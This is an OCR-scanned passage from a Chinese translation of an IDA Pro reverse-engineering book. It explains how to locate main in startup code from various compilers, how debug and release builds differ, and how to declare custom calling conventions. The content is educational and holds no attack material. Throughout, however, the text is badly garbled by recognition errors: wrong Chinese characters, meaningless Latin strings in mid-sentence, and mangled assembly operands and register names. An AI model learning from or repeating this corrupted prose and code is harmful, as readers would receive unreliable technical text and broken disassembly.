模糊 处 理 的 二 进 制 文件 为 例 ， 遇 到 这 类 文件 ，IDA 肯定 无 法 匹配 一 个 启动 签名 ， 因 为 启动 例 程 本 
吴 也 经 过 模糊 人 处理。 如 果 你 努力 对 该 文件 进行 去 模糊 处 理 (第 21 章 的 主题 )， 你 可 能 不 但 需要 和 月 
己 定 位 main 函数 ， 而 且 需 要 定位 原始 的 启动 例 程 。 

在 使 用 传统 main 函数 "的 C 和 C++ 程序 中 , 启动 代码 的 一 个 责任 是 设置 main 所 需 的 栈 参 数 、 
整数 arge (命令 行 参数 的 数量 )、 字 符 指 针 数组 argv (一 个 指针 数组 ， 这 里 的 指针 指向 包含 命令 
行 参数 的 字符 串 ) 以 及 字符 指针 数组 envp (一 个 由 指 癌 字符 串 的 指针 构成 的 数组 , 这些 字符 串 包 
含 在 程序 调用 时 设置 的 环境 变量 )。 下 面 的 代码 摘自 一 个 动态 链接 、 去 除 符 号 的 FreeBSD 8.0 二 
进 制 文件 ， 它 说 明 gcc 生成 的 启动 代码 如 何在 FreeBSD 系统 上 调用 main pe 









































(D Windows GUI 应 用 程序 需要 WinMain 图 数 而 非 main ët AX WinMain 的 文档 资料 ， 请 访问 http://msdn2. 
microsoft.com/en-us/library/ms633559.aspx ; 
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.text:08048365 mov dword ptr [esp], offset term proc ; func 
. text :0804836C Ocall  atexit 

. text :08048371 ecall init proc 

. text :08048376 lea eax, [ebp«arg ol 

. text :08048379 mov [esp«8], esi 

. text :0804837D mov [esp+4], eax 

. text :08048381 mov [esp], ebx 

. text :08048384 e call sub 8048400 

. text :08048389 nov [esp], eax ; status 

. text :0804838C Ocall _exit 


在 这 段 代 码 中 ， 绪 果 表 明 ， 调 用 sub 804840 ( 9) 实际 上 就 是 调用 main mr. AERE 
典型 的 启动 顺序 ， 因 为 它 在 调用 main 之 前 调用 了 初始 化 限 数 ( atexit Wl init proc )， 而 在 
main 函数 返回 后 调用 了 exit 函数 ( @ ), 调用 exit 可 确保 程序 在 main 函数 返回 时 完全 终止 ,而 
不 是 在 调用 exit 后 终止 。 注意 , 传递 给 exit 的 参数 ( @ ) 是 main 函数 在 EAX 中 返回 的 值 ， 
此 ,程序 的 退出 代码 为 main 函数 的 返回 值 。 

如 果 前 面 的 程序 为 静态 链接 且 去 除了 符号 , 那么 , 这 时 的 启动 例 程 将 与 前 面 例子 中 的 启动 例 
程 的 结构 相同 。 但 是 ,没有 一 个 库 前 数 会 使 用 对 我 们 有 用 的 名 称 。 这 时 ,main KAAS "lu en 
而 出 ”， 因 为 它 是 唯一 一 个 使 用 3 个 参数 调用 的 函数 。 当 然 ， 尺 早 应 用 FLIRT 签名 还 有 助 于 还 原 
许多 库 函 数 的 名 称 ， 并 使 main 函数 和 前 面 的 例子 中 一 样 凸 显 出 来 。 

在 不 同 的 平台 上 运行 时 ， 同 一 个 编 详 希 可 能 会 生成 截然 不 同 的 代码 ,为 证 明 这 一 点 ,我们 看 
下 面 这 个 例子 。 它 同样 使 用 gcc 创建 ， 是 一 个 动态 链接 、 去 除 符 号 的 、Linux 系统 上 的 Linux 二 
进 制 文件 : 








.text:080482BO start proc near 

. text :080482B0 xor ebp, ebp 

. text : 080482B2 pop esi 

. text :080482B3 mov ecx, esp 

. text: 080482B5 and esp, OFFFFFFFOh 

. text :080482B8 push eax 

. text :080482B9 push esp 

. text :080482BA push edx 

. text :080482BB O push offset sub 80483CO 
. text :080482CO0 Opush offset sub 80483DO 
. text :080482C5 push ecx 

. text :080482C6 push esi 

. text :080482C7 Opush offset loc 8048384 
. text :080482CC call = libc start main 
. text :080482D1 hlt 

.text:080482D1 start endp 


在 这 个 例子 中 ，start NORD F—7 T ESZX:.— libe start mains 38H] 1ibc start main 
的 目的 是 执行 在 前 面 的 FreeBSD 例子 中 执行 的 所 有 任务 ， 包 括 调用 main 函数 并 最 终 调 用 exito 
由 于 libe start main 是 一 个 库 函 数 ， 因 此 ， 如 果 它 知道 main 函数 的 确切 位 置 ， 肯 定 是 通过 它 
的 一 个 参数 ( 这 里 它 似 乎 有 8 个 参数 ) 获知 的 。 很 明显 ， 其 中 的 两 个 参数 @ 和 @ 是 函数 指针 ， 而 
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第 三 个 参数 @ 是 .text Tipimde T rose S fex RUP, CHULZROR T BE eR HT RE 
为 main 函数 的 线索 ， 因 此 ， 你 需要 分 析 这 3 个 可 能 位 置 的 代码 ， 以 正确 确定 main PRACT o 
这 可 能 是 一 种 有 益 的 练习 。 你 可 能 还 记得 ， 传 递 给 _1ibc start main 的 第 一 个 参数 ( 在 栈 的 最 
顶端 ， 因 而 最 后 被 压 和 人 ) 实际 上 是 一 个 指向 main 的 指针 。 有 两 个 因素 阻止 IDA 将 loc 8048384 
确定 为 函数 〈 它 可 能 名 为 sub_8048384 )。 第 一 个 因素 是 它 从 未 被 百 接 调用 ， 因 此 ，1oc_ 8048384 
绝 不 会 是 一 条 调用 指令 的 目标 。 第 二 个 因素 是 ， 虽 然 IDA 基于 已 识别 函数 的 “序言 "， 提 供 了 它 
们 的 “启发 ”( 这 也 是 sub 80483C0 和 sub 80483D0 被 确定 为 函数 的 原因 ， 即 使 它们 同样 从 未 被 直 
接 调 用 )， 但 是 ，1oc_8048384 (main 函数 ) AR PROTEUS fH. IDA. 能 够 识别 的 “序言 ”。 这 段 
“惹事 生 非 ”的 “序言 ”( 包 括 注 释 ) 如 下 所 示 : 














. text :08048384 loc 8048384: DATA XREF: start+17 个 o 


we 


. text :08048384 lea ecx, [esp44] ; address of arg O into ecx 

. text :08048388 and esp, OFFFFFFFOh ; 16 byte align esp 

. text :0804838B push ` dword ptr [ecx-4] ; push copy of return address 
. text :0804838E € push ebp ; save caller's ebp 

. text :0804838F Omov ebp, esp ; initialize our frame pointer 
. text :08048391 push ecx ; Save ecx 

. text :08048392 ©@sub esp, 24h ; allocate locals 





很 明显 ， 这 段 “ 序 言 ” 包 含 一 个 使 用 EBP 作为 帧 指针 的 函数 的 传统 “序言 ”的 所 有 要 素 。 
首先 保存 调用 方 的 帧 指针 ( 9 0, 然后 为 当前 困 数 设置 帧 指针 ( @ ), 最 后 为 局 部 变量 分 配 空间 ( @ )。 
IDA 的 问题 在 于 ， 这 些 操 作 并 非 作为 函数 中 的 前 几 项 操作 而 发 生 ， 因 此 IDA 的 “局 发 ”失效 。 
这 时 ， 要 手动 创建 一 个 图 数 ， 操 作 起 来 非常 简单 (Edit >» Functions » Create Function )， 但 是 ， 你 
应 该 小 心 监视 IDA 的 行为 。 就 像 它 起 初 无 法 识别 该 函数 一 样 ， 它 可 能 同样 无 法 确定 该 晒 数 使 用 
EBP 作为 帧 指针 。 你 需要 编辑 这 个 函数 (ALT+P ), 3848 IDA 相信 该 函数 使 用 一 个 基于 BP 的 帧 ， 
并 对 专门 用 于 保存 寄存 顶 和 局 部 变量 的 栈 字 节 的 数量 进行 调整 。 

和 FreeBSD 二 进 制 文件 一 样 ， 如 果 前 面 的 Linux 实例 碰巧 为 静态 链接 ， 并 且 去 除了 符号 ， 那 
么 ， 它 的 起 始 例 程 将 不 会 有 任何 变化 ， 只 是 libe start main 函数 将 失去 它 的 名 称 。 这 时 ， 基 
于 gce 的 Linux 启动 例 程 仪 调用 一 个 孔 数 , 且 该 也 数 的 第 一 个 参数 为 main 函数 的 地 址 , 你 仍然 能 
够 正确 定位 main 函数 。 

在 Windows 平 台 上 ，C/MC++ 编 译名 的 数量 ( 因而 启动 例 程 的 数量 ) 要 更 多 一 些 。 令 人 奇怪 的 
是 , Æ Windows FR E, 我们 可 以 利用 分 析 gcc 在 其 他 平台 上 的 行为 所 获得 的 知识 。 下面 的 启动 
例 程 摘 上 自 一 个 gcc/Cygwin 二 进 制 文件 : 






































.text:00401000 start proc near 
.text:00401000 
.text:00401000 var 28 
.text:00401000 var 24 
.text:00401000 var 20 
.text:00401000 var 2 
.text:00401000 
.text:00401000 push ebp 


dword ptr -28h 
dword ptr -24h 
dword ptr -20h 
word ptr -2 
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. text : 00401001 mov ebp, esp 

. text : 00401003 sub esp, 28h 

. text :00401006 and esp, OFFFFFFFOh 
. text : 00401009 fnstcw [ebp+var 2] 

. text :0040100C movzx eax, [ebp+var 2] 
. text :00401010 and ax, OFOCOh 

. text : 00401014 mov [ebp+var_2], ax 
. text : 00401018 movzx eax, [ebp+var 2] 
. text :0040101( or ax, 33Fh 

. text : 00401020 mov [ebp+var_2], ax 
. text : 00401024 fldcw [ebp+var 2] 

. text : 00401027 mov [esp+28h+var 28], offset sub 4010B0 
. text :0040102E @call sub_401120 





很 明显 ， 这 段 代码 与 前 面 的 Linux 示例 存在 一 些 差 异 。 但 是 ， 有 一 个 地 方 怀 人 地 相似 : 只 有 
一 个 函数 被 调用 ( @ )， 且 该 孔 数 以 一 个 函数 指针 作为 参数 ( @ )。 在 这 个 例子 中 ，sub 401120 的 
作用 与 “1ibc start main 相同 ， 而 sub 4010B0 则 是 程序 的 main 函数 。 

使 用 gcc/MinGW 构建 的 Windows 二 进 制 文件 可 以 使 用 另 一 种 形式 的 start 函数 ,如 下 所 示 : 





.text:00401280 start proc near 

. text :00401280 

.text:00401280 var 8 - dword ptr -8 

. text :00401280 

. text :00401280 push ebp 

.Lext 200401281 mov ebp, esp 

. text :00401283 sub esp, 8 

. text :00401286 mov [esp+8+var 8], 1 
. text :0040128D call ds: set app type 
. text: 00401293 call sub 401150 
.text:00401293 start endp 





这 时 ，IDA 同样 无 法 识别 程序 的 main 函数 。 关 于 main PEZ ER, ABAR EE Tx 
条 线索 : 只 有 AEE (©, sub 401150 ), 该 隐 数 似乎 并 未 使 用 任何 参数 (m main 
函数 应 包含 参数 )。 这 时 ， 最 好 的 办 法 是 继续 在 sub 401150 中 搜索 main 函数 。sub 401150 的 一 
部 分 代码 如 下 所 示 : 


.text:0040122A call | p environ 

. text :0040122F mov eax, [eax] 

. text:00401231 Omov [esp+8], eax 

. text : 00401235 mov eax, ds:dword 404000 
. text :0040123A mov [esp+4], eax 

. text :0040123E mov eax, ds:dword 404004 
. text : 00401243 mov [esp], eax 

. text :00401246 O call sub 401395 

. text : 0040124B mov ebx, eax 

. text :0040124D call  cexit 

. text :00401252 mov [esp], ebx 


. text :00401255 call ExitProcess 
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结果 我 们 发 现 ,这 里 的 函数 与 我 们 前 面 看 到 的 与 FreeBSD 有 关 的 Start 函数 有 许多 相似 之 处 。 
sub 401395 可 能 就 是 main 函数 , 因为 它 是 唯一 一 个 使 用 3 个 参数 (@ 、 上 日 和 @ ) 调用 的 非 库 函数 ， 
而 且 第 三 个 参数 (@ ) 与 库 函 数 p environ 的 返回 值 有 关 ， 这 使 我 们 联想 到 一 个 事实 ， 即 main 
国 数 的 第 三 个 参数 应 该 是 一 个 指向 环境 字符 串 数 组 的 指针 。 虽 然 并 未 显示 , 但 这 段 代 码 在 之 前 还 
调用 了 getmainargs 库 函 数 ， 以 在 真正 调用 main më Bl ix arge 和 argv 参数 ,并 进一步 强化 
一 个 概念 : main 函数 即将 被 调用 。 

Visual C/C++ 代码 的 启动 例 程 简洁 明了 ， 如 下 所 示 : 





.text:0040134B start proc near 

.text:0040134B call | Security init cookie 
. text :00401350 jmp tmainCRTStartup 
.text:00401350 start endp 











通过 应 用 启动 签名 , 而 非 因 为 程序 链接 到 一 个 包含 给 定 符号 的 动态 库 , IDA 识别 出 两 条 指令 
引用 的 库 例 程 。IDA 的 启动 签名 能 够 轻松 确定 最 初 调用 main 函数 的 位 置 ， 如 下 所 示 





. text :004012D8 mov eax, envp 

. text :004012DD mov dword 40ACFA4, eax 

. text :004012E2 push eax ; envp 
.text :004012E3 push argv ; argv 

. text:004012E9 push argc ; argc 

. text :004012EF Ocall main 

. text :004012F4 add esp, OCh 

. text :004012F7 mov [ebp+var 1C], eax 

. text :004012FA cmp [ebp+var 20], 0 

. text :004012FE jnz short $LN35 

. text : 00401300 push eax ; uExitCode 
. text :00401301 call $LN27 

.text:00401306 $LN35: ; CODE XREF: ` tmainCRTStartup*169Y/j 
. text : 00401306 call | cexit 

. text :0040130B jmp short loc 40133B 





在 tmainCRTStartup 的 整个 代码 中 ，_main 是 唯一 一 个 使 用 3 ZAR HIR KA RA 
分 析 我 们 发 现 , 在 调用 main KAZAT, 程序 还 调用 了 GetCommondLine PEPAZC, 这 是 另 一 个 迹象 ， 
说 明 程 序 不 久 将 调用 main 函数 。 关 于 如 何 使 用 启动 签名 的 最 后 一 点 提示 ， 需 要 注意 的 是 ， 在 这 
个 例子 中 ，IDA 通过 匹配 一 个 启动 签名 ， 完 全 徘 它 自己 生成 了 main dA. mE, ASCI F 
符 串 main 并 未 出 现在 这 个 例子 使 用 的 二 进 制 文件 中 。 因 此 ， 即 使 一 个 二 进 制 文件 已 经 被 去 除了 
符号 ， 只 要 IDA 能 够 匹配 一 个 启动 签名 ， 它 仍然 能 够 发 现 并 标识 main PRAEC. 

下 面 我 们 将 要 分 析 的 最 后 一 个 C 编译 器 启动 例 程 由 Borland 的 免费 命令 行 编译 器 生成 ”。 
Borland 启动 例 程 的 最 后 几 行 代码 如 下 所 示 : 




















(D 参见 http://forms.embarcadero.com/forms/BLL32lompilerDownload/。 
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.text:00401041 @push offset off 4090B8 
.text:00401046 push 0 ; lpModuleName 
. text :00401048 call GetModuleHandleA 

. text : 0040104D mov dword_409117, eax 

. text :00401052 push 0 ; fake return value 
. text :00401054 jmp | Startup 


压 人 到 栈 上 的 指针 值 (@ ) 引用 了 一 个 结构 体 ， 该 结构 体 义 包含 一 个 指 癌 main 函数 的 指 
fh. YE startup 中 ,调用 main 的 设置 如 下 所 示 : 





.text:00406997 mov edx，dword 40BBFC 

. text :0040699D Opush edx 

. text :0040699E mov ecx, dword 40BBF8 

. text :004069A4 O push ecx 

. text :004069A5 mov eax, dword_40BBF4 

. text :004069AA Opush eax 

. text: 004069AB e call dword ptr [esi«18h] 

. text: 004069AE add esp, OCh 

. text :004069B1 push eax ; status 


. text :004069B2 call _exit 


同样 ， 这 个 例子 与 前 面 的 例子 有 许多 相似 之 处 : 调用 main äu ( 6) 时 使 用 了 3 个 参数 @、 
Ə ( startup 中 唯一 一 个 如 此 调用 的 函数 )， 返 回 值 被 直接 传递 给 ex 让 ， 以 终止 程序 。 进 
一 步 分 析 startup 后 ， 我 们 发 现 ， 程 序 还 调用 了 Windows API Pë GetEnvironmentSrtings 和 
GetCommandLine， 这 通常 是 调用 main 函数 的 先兆 。 

最 后 ， 为 了 证 明 跟 踪 程 序 的 main 函数 并 不 是 C 程序 特有 的 问题 ， 我 们 以 下 面 这 个 已 编译 的 
Visual Basic 6.0 程序 的 启动 代码 为 例 : 























.text:004018A4 start: 
.text:004018A4 @push offset dword 401994 
. text :004018A9 call ThunRTMain 


ThunRTMain 库 函 数 的 作用 与 Linux libc start main 函数 的 作用 类 似 ， 它 在 调用 程序 的 main 

国 数 之 前 执行 任何 所 需 的 初始 化 任务 。 为 了 将 控制 权 转 交 给 main ERUN. Visual Basic 采用 一 种 与 

前 面 例子 中 的 Borland 代码 非常 类 似 的 机 制 。ThunRTMain 仅 包含 一 个 参数 (@ ), EST 问 结 

构 体 的 指针 ， 该 结构 体 中 包含 进行 程序 初始 化 所 需 的 其 他 信息 ， 包 括 main 函数 的 地 址 。 这 个 结 
构 体 的 内 容 如 下 所 示 : 











.text:00401994 dword 401994 dd 21354256h, 2A1FFOh, 3 dup(0) ; DATA XREF: .text:start 人 个 o 


.text:004019A8 dd 7Eh, 2 dup(O) 

.text:004019B4 dd OA0000h, 409h, 0 

.text:004019C0 @dd offset sub 4045D0 

.text:004019C4 dd offset dword 401A1C 

.text:004019C8 dd 30F012h, oFFFFFFOOh, 8, 2 dup(1), OE9h, 401944h, 4018ECh 


. text:004019C8 dd 4018BOh, 78h, 7Dh, 82h, 83h, 4 dup(0) 
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在 这 个 数据 结构 中 , 只 有 一 项 (@ ) 引 用 了 代码 , 它 就 是 指向 sub 404500 的 指针 。 事实 证 明 ， 
sub 4045D0 就 是 程序 的 main PKZ 

最 后 ， 要 学 会 如 何 定 位 main 因数 ， 你 需要 了 解 如 何 构建 可 执行 文件 。 如 果 你 遇 到 困难 ， 你 
可 以 利用 构建 你 所 分 析 的 二 进 制 文 件 所 使 用 的 工具 ， 构 建 一 些 简 单 的 可 执行 文件 (例如 ， 引 用 
main 国 数 中 的 一 个 易于 识别 的 字符 串 )。 通 过 分 析 这 些 简 单 的 文件 ， 你 将 逐步 了 解 使 用 一 组 特定 
的 工具 构建 的 二 进 制 文 件 的 基本 结构 , 并 利用 这 些 知 识 , 进一步 分 析 使 用 同一 组 工具 构建 的 更 加 
复杂 的 二 进 制 文件 。 


20.4 调试 版 与 发 行 版 二 进 制 文件 


通常 ， 微 软 的 Visual Studio 项 目 能 够 构建 调试 版 本 或 发 行 版 本 的 二 进 制 程序 。 要 了 解 这 两 个 
版 本 之 间 的 差异 , 可 以 比较 一 个 项 目的 调试 版 本 和 发 行 版 本 所 指定 的 构建 选项 。 二 者 之 间 的 细微 
差异 包括 : 发 行 版 本 通常 经 过 优化 "， 而 调试 版 本 则 没有 ; 调试 版 本 链接 有 其 他 符号 信息 和 运行 
库 ， 而 发 行 版 本 则 没有 。 增 加 与 调试 有 关 的 符号 ， 有 助 于 调试 需 将 汇编 语言 语句 转换 成 它们 对 应 
的 源 代码 ， 还 有 助 于 确定 局 部 变量 的 名 称 ”"。 通 常 ， 这 些 信 息 会 在 编译 过 程 中 丢失 。 在 编译 调试 
版 本 的 微软 运行 库 时 ,我 们 还 可 以 包含 调试 符号 、 禁 用 优化 并 启用 其 他 安全 检查 ,以 核实 一 些 也 
数 参数 是 否 有 效 。 

使 用 IDA 进行 反 汇 编 时 ，Visual Studio 项 目的 调试 版 本 与 发 行 版 本 之 间 存 在 着 明显 的 差异 。 
这 是 仅 调 试 版 本 指定 了 编译 需 和 链接 需 选 项 的 结果 ,， 如 基本 的 运行 时 检查 ( /RTCx”) 选项 , CE 
最 终 的 二 进 制 文件 中 引入 了 额外 的 代码 。 这 些 额 外 的 代码 会 造成 一 个 “副作用 ”: 它 会 破坏 IDA 
的 启动 签名 匹配 过 程 ， 导 致 IDA 总 是 无 法 自动 定位 调试 版 本 的 二 进 制 文件 中 的 main PRAEC. 

在 调试 版 本 的 二 进 制 文 件 中 ， 一 个 明显 的 不 同 是 几乎 所 有 的 函数 都 通过 jump 函数 (也 叫做 
thunk 函数 ) 调用 ， 如 下 面 的 代码 片段 所 示 : 
























































© .text:00411050 sub 411050 proc near ; CODE XREF: start _0+3Wp 
. text :00411050 Q jmp sub 412AEO 
.text:00411050 sub 411050 endp 
€ .text:0041110E start proc near 
. text :0041110E Oo jmp start 0 
.text:0041110E start endp 
© .text:00411920 start 0 proc near ; CODE XREF: start^^j 
. text :00411920 push ebp 
. text :00411921 mov ebp, esp 
. text :00411923 Ocall sub 411050 





CD 优化 通 篆 是 指 删 除 代 码 中 的 多 余 代码 ， 或 选择 更 快 但 可 能 更 大 的 代码 序列 ， 以 满足 开发 者 的 期 望 ， 即 创建 更 快 或 
更 小 的 可 执行 文件 。 与 未 优化 代码 相 比 ， 分 析 经 过 优化 的 代码 要 困难 一 些 ， 因 此 ， 在 程序 的 开发 和 调试 阶段 ,使 
用 优化 代码 被 视 为 是 一 个 错误 的 选择 。 

D 在 编译 过 程 中 ，gcc 也 能 够 插入 调试 符号 。 

(3) 参见 http://msdn.microsoft.com/en-us/library/8wtf2dfz.aspx。 
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. text :00411928 call sub 411940 
. text :0041192D pop ebp 
.Lext:0041192E retn 

.text :0041192E start 0 endp 


在 这 个 例子 中 ， 程 序 人 口 点 (4@ ) T SER Ce) IREKE CO) 外 ， 其 他 什么 
It. JARAH C 0 为 一 个 函数 ( @ ), 而 后 者 则 跳 转 到 ( 9 ) 启动 函数 的 实现 位 置 。 
@ 和 人 @ 这 两 个 子 数 中 没有 其 他 内 容 ， 只 有 一 个 叫做 chunk 函数 的 跳 转 语句 。 在 调试 版 本 的 二 进 
制 文件 中 大 量 使 用 thunk 函数 给 IDA 的 签名 匹配 过 程 造成 一 个 很 大 的 障碍 。 昌 然 thunk 函数 会 
大 大 减 慢 你 的 分 析 进 程 ， 但 使 用 前 一 市 中 描述 的 技巧 ， 你 仍然 可 以 跟踪 到 三 进 制 文件 的 main 

在 调试 版 本 的 二 进 制 文件 中 进行 基本 的 运行 时 检查 , 会 叶 致 在 执行 任何 少数 时 部 增加 其 他 一 
些 操作 。 一 个 调试 版 本 的 二 进 制 文件 的 扩充 版 “序言 ”如 下 所 未: 


























.text:00411500 push ebp 
.text:00411501 mov ebp，esp 

. text :00411503 O sub esp, OFOoh 

. text :00411509 push ebx 

. text :0041150A push esi 

. text :0041150B push edi 

. text :0041150C @lea edi, [ebp+var Fo] 
. text :00411512 mov ecx, 3Ch 

. text :00411517 mov eax, OCCCCCCCCh 
. text :0041151C rep stosd 

. text :0041151E mov [ebp+var 8], O 
. text :00411525 mov [ebp+var 14], 1 
. text :0041152C mov [ebp+var 20], 2 
. text:00411533 mov [ebp+var 2C], 3 





这 个 例子 中 的 函数 使 用 4 个 局 部 变量 , 它们 仅仅 需要 16 个 字 世 的 栈 空 间 。 但 是 ,我 们 看 到 ， 
这 个 函数 分 配 了 240 AFE CO) 的 栈 空间 , 然后 用 0xCC 这 个 值 填充 这 240 TFE. MOFARE 
4 行 代码 等 同 于 下 面 的 函数 调用 : 








memset(&var FO, OxCC, 240); 


字 节 值 0xCC 对 应 于 int 3 的 x86 PRETI, int 3 是 一 个 软件 中 断 ， 它 会 使 一 个 程序 进入 调试 
deih. IO OxCC 值 填充 栈 帧 ， 是 为 了 确保 当 程 序 试图 执行 栈 中 的 指令 时 《在 调试 版 本 的 二 进 
制 文 件 中 可 能 会 遇 到 的 错误 条 件 )， 调 试 希 将 被 调用 。 

这 个 函数 的 局 部 变量 从 目 处 开始 初始 化 ,从 那里 我 们 注意 到 ,这些 变量 并 不 是 彼此 相 邻 。 它 
们 之 间 的 多 余 空 间 由 前 面 的 memset 操作 用 OxCC 值 填充 。 但 是 ， 变 量 之 间 的 额外 空间 会 使 我 们 更 
易于 检测 出 一 个 变量 的 溢出 情况 ,这 种 淤 出 可 能 会 波及 为 一 个 变量 , 并 给 它 造 成 破坏 。 在 正常 情 
况 下 ， 任 何 已 声明 变量 之 外 用 作 填 充 符 的 0xCC 值 ， 绝 不 可 能 被 覆 写 。 为 了 便于 比较 ， 上 面 代码 
的 发 行 版 本 如 下 所 未 : 
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. text: 004018DO0 push ebp 

. text:004018D1 mov ebp, esp 

. text : 004018D3 O sub esp, 10h 

. text : 004018D6 mov [ebp+var 4], 0 
. text :004018DD mov [ebp+var C], 1 
. text :004018E4 mov [ebp+var 8], 2 
. text :004018EB mov [ebp+var 10], 3 


我 们 看 到 , 发 行 版 本 仅 为 局 部 变量 分 配 了 所 需 的 空间 (@ ), 而 且 所 有 4 个 变量 彼此 相 邻 (@ )。 
还 要 注意 的 是 ， 这 时 已 不 再 需要 使 用 0xCC 作为 填充 值 。 


20.5 ”其 他 调用 约定 


在 第 6 章 中 ,我 们 讨论 了 C 和 C++ 代码 常用 的 许多 调用 约定 ,虽然 在 连接 两 个 已 编 详 模 块 时 ， 
我 们 必须 休 循 一 个 已 发 布 的 调用 约定 , 但 是 在 单独 一 个 模块 中 ,函数 使 用 目 定 义 调 用 约定 并 不 会 
受到 任何 限制 。 高 度 优化 的 函数 党 篆 使 用 目 定 义 调用 约定 ,不 过 ,这些 函数 不 能 从 它们 所 在 的 模 
块 之 外 调用 。 

下 面 的 代码 是 一 个 使 用 非 标 准 调 用 约定 的 函数 的 前 4 行 : 











.text:000158AC sub 158AC proc near 
.text:000158AC 
@ .text:000158AC arg 0 = dword ptr 4 
.text:000158AC 
.text:000158AC push [esptarg 0] 
.text:000158BO mov edx, [eax«118h] 
. text :000158B6 push eax 
. text :000158B7 Omovzx ecx, cl 
. text:000158BA mov cl, [edxeecx«oAoh | 


根据 IDA 的 分 析 ， 该 函数 的 栈 帧 中 只 有 一 个 参数 C 90 存在 。 但 是 ， 经 过 仔细 分 析 ， 我 们 发 
D. rm" EAX 寄存 器 〈@ ) 和 CL 寄存 带 ( @ )， 但 没有 进行 任何 初始 化 。 据 此 ， 我 
们 得 出 的 唯一 结论 是 ，EAX 和 CL 寄存 右 应 由 调用 方 初始 人 化。 因此， 我们 应 把 这 个 函数 看 成 是 一 
个 包含 3 个 参数 的 函数 ， 而 不 是 仅 包 含 一 个 参数 的 防 数 。 在 调用 它 时 ,你 必须 特别 小 心 ， 以 确保 
它 的 3 个 参数 都 处 在 正确 的 位 置 。 

通过 设置 丽 数 的 “类 型 ”，IDA 能 够 指定 任何 函数 的 目 定 义 调用 约定 。 通 过 Edit» 
Functions » Set function type ( 编辑 函数》 设置 函 数 类 型 ) 有 亲 单 项 输入 函数 的 原型 并 使 用 IDA 的 
_usercall 调用 约定 ， 即 可 做 到 这 一 点 。 用 于 为 上 一 个 示例 中 的 sub_158AC 设置 类 型 的 对 话 框 如 
图 20-1 所 示 。 





3 Please enter a string E Ka 


Please enter the type dedaration | int usercall sub_ 158AC<eax>(struc 1*<eax>, unsigned — int8 index<d>, int) 





图 20-1 将 因数 指定 为 usercall 
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为 清楚 起 见 ， 下 面 再 次 提供 了 滑 数 声明 : 
int  usercall sub 158AC<eax>(struc 1 *«eax», unsigned _int8 index«cl», int) 


其 中 , IDA 关键 字 usercall 用 于 替代 cdecl 或 stdcall 等 标准 调用 约定 。 要 使 用 usercall, 
我 们 需要 将 保存 也 数 的 返回 值 的 寄存 冀 名 称 附加 到 函数 名 称 之 前 ( 此 例 中 得 到 sub_158AC<eax> ), 
告知 IDA 该 寄存 需 的 名 称 。 如 果 函 数 不 返 回 值 ， 则 可 以 省 略 返 回 寄 存 咒 。 在 参数 列表 中 ， 还 必 
须 在 将 对 应 的 寄存 需 名 称 附加 到 参数 的 数据 类 型 之 前 ,为 每 个 基于 寄存 髓 的 参数 提供 注释 。 设 置 
PCIE, IDA 将 向 实施 调用 的 函数 传播 参数 信息 ， 清 楚 说 明 函 数 调用 顺序 ， 如 下 面 的 代码 
所 示 : 














.text:00014B9F Olea eax, [ebp+var_218] ; struc_1 * 
. text : 00014BA5 mov cl, 1 ; index 
.text:00014BA7 O push edx ; int 

. text : 00014BA8 call sub 158AC 


从 上 述 代码 中 可 以 明显 看 出 , IDA 识别 出 : EAX 将 保存 函数 的 第 一 个 参数 ( 9 ), CL 将 保存 
第 二 个 参数 ( @ )， 第 三 个 参数 将 位 于 栈 上 CO). 

即使 在 一 个 可 执行 文件 中 , 调用 约定 也 可 能 截然 不 同 。 为 说 明 这 一 点 ,我们 提供 了 男 一 个 取 
自 同 一 个 二 进 制 文件 的 、 使 用 自 定 义 调 用 约定 的 示例 ， 如 下 所 示 : 


.text:0001669E sub 1669E proc near 
. text :0001669E 
€ .text:0001669E arg 0 - byte ptr 4 
. text :0001669E 
.text:0001669E mov eax, [esi+18h| 
. text :000166A1 add eax, 684h 
. text :000166A6 cmp [esptarg 0], 0 


在 这 个 例子 中 ，IDA 同样 指出 ， 也 数 仅 访 问 了 栈 帧 中 的 一 个 参数 ( @ 0. 仔细 分 析 代 人 码 后 会 
发 现 ， 在 调用 这 个 水 数 之 前 ， 还 应 对 ESI 寄存 带 ( @ ) 进行 初始 化 。 这 个 例子 说 明 ， 即 使 对 同一 
个 二 进 制 文件 而 言 ， 保 存 与 寄存 带 有 关 的 参数 的 寄存 带 也 可 能 因 消 数 而 异 。 

通过 这 些 例子 , 我 们 得 到 的 教训 是 : 你 必须 了 解 一 个 函数 如 何 初 始 化 它 所 使 用 的 每 一 个 寄存 
售 。 如 果 一 个 函数 在 初始 化 一 个 寄存 带 之 前 使 用 了 该 寄存 带 , 那么 这 个 寄存 融 是 用 来 传递 一 个 参 
数 的 。 请 参阅 第 6 半 ， 了 人 解 各 种 编 闯 瘟 和 调用 约定 使 用 哪些 寄存 带 。 








20.6 小结 





特定 于 编 详 肖 的 行为 的 数量 非 凋 庞大 ， 仅 仅 一 章 内 容 ( 甚至 相关 主题 的 一 本 书 ) 并 不 足以 
完全 介绍 所 有 行为 。 除 其 他 行为 差异 外 ， 编 详 表 还 选择 不 同 的 算法 来 实现 各 种 高 级 结构 ， 并 选 
择 不 同 的 方式 来 优化 生成 的 代码 。 在 很 大 程度 上 上， 编译 硕 的 行为 取决 于 在 构建 过 程 中 传递 给 它 
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的 参数 ， 因 此 ， 使 用 相同 的 源 代 码 但 采用 不 同 的 构建 选项 ， 一 个 编译 硕 可 能 会 生成 截然 不 同 的 
二 进 制 文件 。 要 学 会 如 何 处 理 所 有 这 些 不 同 的 变 体 ， 你 需要 不 断 积 素 经 验 。 使 问题 更 加 复杂 的 
是 ， 关 于 特定 的 汇编 语言 结构 ， 你 很 难 搜索 到 相关 帮助 ， 因 为 要 想 构建 一 个 搜索 表达 式 ， 生 成 
符合 你 的 特殊 要 求 的 结 末 ， 可 能 会 非常 困难 。 通 稼 ， 遇 到 这 种 情况 时 ， 各 种 专门 讨论 逆 同 工程 
的 论坛 是 你 可 以 利用 的 最 佳 资源 ， 你 可 以 将 相关 代码 粘贴 在 这 些 论坛 上 ， 利 用 那些 和 你 具有 相 
同 经 历 的 人 的 经 验 。 
































模糊 代码 分 析 





EI] 全 在 再起 情况 下 ， 理 钥 一 个 反 汇编 代码 清单 也 相当 困难 。 对 于 任何 计划 深入 控 所 一 
进 制 文件 内 部 机 制 的 人 来 说 ， 高 质量 的 反 汇 编 工作 都 非常 重要 ， 这 也 正 是 我 们 用 前 
面 整整 20 章 内 容 讨论 IDA Pro 及 其 功能 的 原因 。 你 可 能 会 说 ，IDA 如 此 高 效 ， 它 降低 了 人 们 
